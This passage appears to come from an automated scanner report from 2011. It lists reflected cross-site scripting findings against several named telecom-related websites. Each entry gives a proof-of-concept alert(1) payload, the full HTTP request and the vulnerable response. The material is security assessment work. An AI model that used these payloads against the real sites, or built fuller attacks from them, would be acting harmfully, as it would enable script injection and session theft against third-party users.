P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://nanpa.org/recent_forum_posts.phpd9a60<script>alert(1)</script>dec3bb51a6f</span>
...[SNIP]...

3.12. http://syndicate.industryclick.com/feedmix/connected_planet_all_with_teaser/heds.js [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syndicate.industryclick.com
Path:	/feedmix/connected_planet_all_with_teaser/heds.js

Issue detail

The value of the count request parameter is copied into the HTML document as plain text between tags. The payload b47cc<script>alert(1)</script>8e664057342 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedmix/connected_planet_all_with_teaser/heds.js?count=5b47cc<script>alert(1)</script>8e664057342&pool=5 HTTP/1.1
Host: syndicate.industryclick.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 00:48:44 GMT
Server: Zope/(Zope 2.7.4-0, python 2.3.5, linux2) ZServer/1.1
Bobo-Exception-Line: 10
Content-Length: 189
Bobo-Exception-Value: See the server error log for details
Content-Type: text/html
Bobo-Exception-Type: ValueError
Bobo-Exception-File: Script (Python)
Via: 1.1 syndicate.industryclick.com
Connection: close

<html>
<head><title>connected_planet_all_with_teaser</title></head>
<body bgcolor="#FFFFFF">

invalid literal for int(): 5b47cc<script>alert(1)</script>8e664057342

</body>
</html>

3.13. http://syndicate.industryclick.com/feedmix/connected_planet_all_with_teaser/heds.js [pool parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syndicate.industryclick.com
Path:	/feedmix/connected_planet_all_with_teaser/heds.js

Issue detail

The value of the pool request parameter is copied into the HTML document as plain text between tags. The payload d94a5<script>alert(1)</script>24642529fa1 was submitted in the pool parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedmix/connected_planet_all_with_teaser/heds.js?count=5&pool=5d94a5<script>alert(1)</script>24642529fa1 HTTP/1.1
Host: syndicate.industryclick.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 00:48:47 GMT
Server: Zope/(Zope 2.7.4-0, python 2.3.5, linux2) ZServer/1.1
Bobo-Exception-Line: 15
Content-Length: 189
Bobo-Exception-Value: See the server error log for details
Content-Type: text/html
Bobo-Exception-Type: ValueError
Bobo-Exception-File: Script (Python)
Via: 1.1 syndicate.industryclick.com
Connection: close

<html>
<head><title>connected_planet_all_with_teaser</title></head>
<body bgcolor="#FFFFFF">

invalid literal for int(): 5d94a5<script>alert(1)</script>24642529fa1

</body>
</html>

3.14. http://syndicate.industryclick.com/feedmix/connected_planet_bss_oss/heds.js [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syndicate.industryclick.com
Path:	/feedmix/connected_planet_bss_oss/heds.js

Issue detail

The value of the count request parameter is copied into the HTML document as plain text between tags. The payload 256ed<script>alert(1)</script>e87fa36bb99 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedmix/connected_planet_bss_oss/heds.js?count=2256ed<script>alert(1)</script>e87fa36bb99&pool=2 HTTP/1.1
Host: syndicate.industryclick.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 00:48:15 GMT
Server: Zope/(Zope 2.7.4-0, python 2.3.5, linux2) ZServer/1.1
Bobo-Exception-Line: 10
Content-Length: 181
Bobo-Exception-Value: See the server error log for details
Content-Type: text/html
Bobo-Exception-Type: ValueError
Bobo-Exception-File: Script (Python)
Via: 1.1 syndicate.industryclick.com
Connection: close

<html>
<head><title>connected_planet_bss_oss</title></head>
<body bgcolor="#FFFFFF">

invalid literal for int(): 2256ed<script>alert(1)</script>e87fa36bb99

</body>
</html>

3.15. http://syndicate.industryclick.com/feedmix/connected_planet_bss_oss/heds.js [pool parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://syndicate.industryclick.com
Path:	/feedmix/connected_planet_bss_oss/heds.js

Issue detail

The value of the pool request parameter is copied into the HTML document as plain text between tags. The payload cd33e<script>alert(1)</script>c1014f2447a was submitted in the pool parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feedmix/connected_planet_bss_oss/heds.js?count=2&pool=2cd33e<script>alert(1)</script>c1014f2447a HTTP/1.1
Host: syndicate.industryclick.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 00:48:18 GMT
Server: Zope/(Zope 2.7.4-0, python 2.3.5, linux2) ZServer/1.1
Bobo-Exception-Line: 15
Content-Length: 181
Bobo-Exception-Value: See the server error log for details
Content-Type: text/html
Bobo-Exception-Type: ValueError
Bobo-Exception-File: Script (Python)
Via: 1.1 syndicate.industryclick.com
Connection: close

<html>
<head><title>connected_planet_bss_oss</title></head>
<body bgcolor="#FFFFFF">

invalid literal for int(): 2cd33e<script>alert(1)</script>c1014f2447a

</body>
</html>

3.16. http://www.911enable.com/business/contact_specialist.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.911enable.com
Path:	/business/contact_specialist.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f02b2"style%3d"x%3aexpression(alert(1))"23c70c3c464 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f02b2"style="x:expression(alert(1))"23c70c3c464 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/contact_specialist.php?provenance=e/f02b2"style%3d"x%3aexpression(alert(1))"23c70c3c464mpty HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.911enable.com/login/index.php
Cookie: __utma=49897326.2023569351.1305162385.1305162385.1305162385.1; __utmb=49897326.5.10.1305162385; __utmc=49897326; __utmz=49897326.1305162385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

3.17. http://www.911enable.com/business/contact_specialist.php [provenance parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.911enable.com
Path:	/business/contact_specialist.php

Issue detail

The value of the provenance request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 907f1"style%3d"x%3aexpression(alert(1))"092838a3115 was submitted in the provenance parameter. This input was echoed as 907f1"style="x:expression(alert(1))"092838a3115 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /business/contact_specialist.php?provenance=empty907f1"style%3d"x%3aexpression(alert(1))"092838a3115 HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.911enable.com/login/index.php
Cookie: __utma=49897326.2023569351.1305162385.1305162385.1305162385.1; __utmb=49897326.5.10.1305162385; __utmc=49897326; __utmz=49897326.1305162385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

3.18. http://www.commpartnersconnect.com/company [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.commpartnersconnect.com
Path:	/company

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 81d1e<script>alert(1)</script>801ba3b362c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /company81d1e<script>alert(1)</script>801ba3b362c?number=&command=AJAXlookup&f=json&format=json&jsoncallback=jsonp1305161150243 HTTP/1.1
Host: www.commpartnersconnect.com
Proxy-Connection: keep-alive
Referer: http://www.onwav.com/lnp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:51:57 GMT
Server: Apache/2.0.59 (CentOS)
X-Powered-By: PHP/5.2.2
Set-Cookie: PHPSESSID=a5e17a7f9d60bb5543670f51e71d4278; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 360
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /company81d1e<script>alert(1)</script>801ba3b362c was not found on this server.<P>
...[SNIP]...

3.19. http://www.commpartnersconnect.com/company [number parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.commpartnersconnect.com
Path:	/company

Issue detail

The value of the number request parameter is copied into the HTML document as plain text between tags. The payload bffcd<script>alert(1)</script>94923c6e023 was submitted in the number parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /company?number=bffcd<script>alert(1)</script>94923c6e023&command=AJAXlookup&f=json&format=json&jsoncallback=jsonp1305161150243 HTTP/1.1
Host: www.commpartnersconnect.com
Proxy-Connection: keep-alive
Referer: http://www.onwav.com/lnp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:50:40 GMT
Server: Apache/2.0.59 (CentOS)
X-Powered-By: PHP/5.2.2
Set-Cookie: PHPSESSID=545eb0d341bd56039888049293fbe63b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 173
Connection: close
Content-Type: text/html; charset=UTF-8

jsonp1305161150243({"body": "<p class=bodycopy01>Phone Number: <b>bffcd<script>alert(1)</script>94923c6e023</b><br>Is not currently in our coverage area.<br><p> </p>"})

3.20. http://www.commpartnersconnect.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.commpartnersconnect.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b0927<script>alert(1)</script>e987f03bb37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob0927<script>alert(1)</script>e987f03bb37 HTTP/1.1
Host: www.commpartnersconnect.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a5e17a7f9d60bb5543670f51e71d4278

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:52:57 GMT
Server: Apache/2.0.59 (CentOS)
X-Powered-By: PHP/5.2.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 364
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.icob0927<script>alert(1)</script>e987f03bb37 was not found on this server.<P>
...[SNIP]...

3.21. http://www.etalkup.com/formjsforoneutf8.aspx [workgroup parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.etalkup.com
Path:	/formjsforoneutf8.aspx

Issue detail

The value of the workgroup request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fe6a"%3balert(1)//cddffea3e9e was submitted in the workgroup parameter. This input was echoed as 3fe6a";alert(1)//cddffea3e9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com3fe6a"%3balert(1)//cddffea3e9e HTTP/1.1
Host: www.etalkup.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:06:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ptrascvqezc34x45yzfao13h; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 510

var kilo_boat_logo="";
var imgChange="";
var gaJsProtocol = (("https:" == document.location.protocol) ? "https://" :"http://");
if(typeof(panelSDK)=="undefined")
{
document.write(
...[SNIP]...
<script type='text/javascript' charset='utf-8' src='"+gaJsProtocol+"www.etalkup.com/getpanelsdk.aspx?workgroup=redsky_wg@workgroup.etalkup.com3fe6a";alert(1)//cddffea3e9e'>
...[SNIP]...

3.22. http://www.etalkup.com/getpanelsdk.aspx [workgroup parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.etalkup.com
Path:	/getpanelsdk.aspx

Issue detail

The value of the workgroup request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcb45'%3balert(1)//97c18dc0ee9 was submitted in the workgroup parameter. This input was echoed as bcb45';alert(1)//97c18dc0ee9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /getpanelsdk.aspx?workgroup=redsky_wg@workgroup.etalkup.combcb45'%3balert(1)//97c18dc0ee9 HTTP/1.1
Host: www.etalkup.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/
Cookie: ASP.NET_SessionId=pa4hprvrpnb4lnibphzigs45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:07:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7963

var gaJsProtocol = (("https:" == document.location.protocol) ? "https://" :"http://");
var kiloboaturl=gaJsProtocol+"www.etalkup.com/images/";
var kilo_boat_globalUrl=gaJsProtocol+"www.etalk
...[SNIP]...
89";
var directWebchatUrl="http://www.etalkup.com:8087";
var kilo_boat_website=gaJsProtocol+"www.etalkup.com";
var kilo_boat_listpersons="";
var kilo_boat_workgroup='redsky_wg@workgroup.etalkup.combcb45';alert(1)//97c18dc0ee9';
var kilo_boat_domain='etalkup.com';
var company="";
var kilo_boat_agentlist="";
var kilo_boat_automation=1==1?"true":"false";
var kilo_boat_InvitationMsg = ""
var kilo_boat_ComfirmJs="";
var
...[SNIP]...

3.23. http://www.nanpa.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nanpa.org
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b03c8<script>alert(1)</script>1df8e9a6163 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob03c8<script>alert(1)</script>1df8e9a6163 HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:14:12 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://www.nanpa.org/favicon.icob03c8<script>alert(1)</script>1df8e9a6163</span>
...[SNIP]...

3.24. http://www.nanpa.org/forums/external.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nanpa.org
Path:	/forums/external.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3871<script>alert(1)</script>d19da0837d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forumsa3871<script>alert(1)</script>d19da0837d8/external.php?type=js HTTP/1.1
Host: www.nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/recent_forum_posts.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:10 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://www.nanpa.org/forumsa3871<script>alert(1)</script>d19da0837d8/external.php</span>
...[SNIP]...

3.25. http://www.nanpa.org/forums/external.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nanpa.org
Path:	/forums/external.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e2cef<script>alert(1)</script>253b7e5f1c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forums/external.phpe2cef<script>alert(1)</script>253b7e5f1c8?type=js HTTP/1.1
Host: www.nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/recent_forum_posts.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:05:13 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://www.nanpa.org/forums/external.phpe2cef<script>alert(1)</script>253b7e5f1c8</span>
...[SNIP]...

3.26. http://www.nanpa.org/viewers/scroller_x.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nanpa.org
Path:	/viewers/scroller_x.swf

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c54e<script>alert(1)</script>0e0f6e0a5f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /viewers9c54e<script>alert(1)</script>0e0f6e0a5f2/scroller_x.swf HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:13:46 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://www.nanpa.org/viewers9c54e<script>alert(1)</script>0e0f6e0a5f2/scroller_x.swf</span>
...[SNIP]...

3.27. http://www.nanpa.org/viewers/scroller_x.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nanpa.org
Path:	/viewers/scroller_x.swf

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9721a<script>alert(1)</script>37549e4044d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /viewers/scroller_x.swf9721a<script>alert(1)</script>37549e4044d HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 00:13:49 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 20842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<span class="redtext">http://www.nanpa.org/viewers/scroller_x.swf9721a<script>alert(1)</script>37549e4044d</span>
...[SNIP]...

3.28. https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do [userStageModel.emailAddr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.nationalnanpa.com
Path:	/nas/security/user_reg_pre_mail.do

Issue detail

The value of the userStageModel.emailAddr request parameter is copied into the HTML document as plain text between tags. The payload 24c54<script>alert(1)</script>508ccbd11b05bf3ba was submitted in the userStageModel.emailAddr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /nas/security/user_reg_pre_mail.do;nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596?method=subscribeMailUser&nnsStateListHidden=AK&userStageModel.emailAddr=24c54<script>alert(1)</script>508ccbd11b05bf3ba HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
Referer: https://www.nationalnanpa.com/nas/security/user_reg_mail.do?method=createNewMode
Cache-Control: max-age=0
Origin: https://www.nationalnanpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:43 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13476

<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
